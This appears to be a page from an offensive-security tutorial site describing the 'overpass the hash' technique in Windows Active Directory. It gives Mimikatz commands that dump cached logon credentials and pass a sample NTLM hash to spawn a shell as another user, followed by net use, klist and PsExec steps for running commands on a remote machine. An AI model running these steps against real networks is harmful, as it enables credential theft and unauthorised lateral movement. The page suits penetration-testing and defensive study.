Overpass the Hash

In this method we use the NTLM hash to get a TGT and TGS from the Domain Controller. In a scenario that you have gained access to a system that another user is logged into, we can use the cached credentials of the user to procure a TGT and TGS, then use it to login to another service or system.

This technique requires access to the special admin share called Admin$, which in turn requires local administrative rights on the target machine.

The following set of commands can be used to generate a TGT once within Mimikatz,

sekurlsa::logonpasswords #This should list the logged on users along with their credentials

#Next is to create the TGT and we are specifying the process to create it
sekurlsa::pth /user:john /domain:p42.com /ntlm:e2b475c22da420638630d874a977c727 /run:PowerShell.exe

With this we should have a command shell with which we can execute command as user John.

We can get the ticket by initiating an interaction with the domain controller,

net use \\computername #this should be the computer that you plan to interact with

klist #This should list the tickets that are available

We can now use psexec tool to execute commands on the remote computer within the context of the user - John,

.\PsExec.exe \\computername cmd.exe

PreviousPass the Hash NextPass the Ticket

Last updated 1 year ago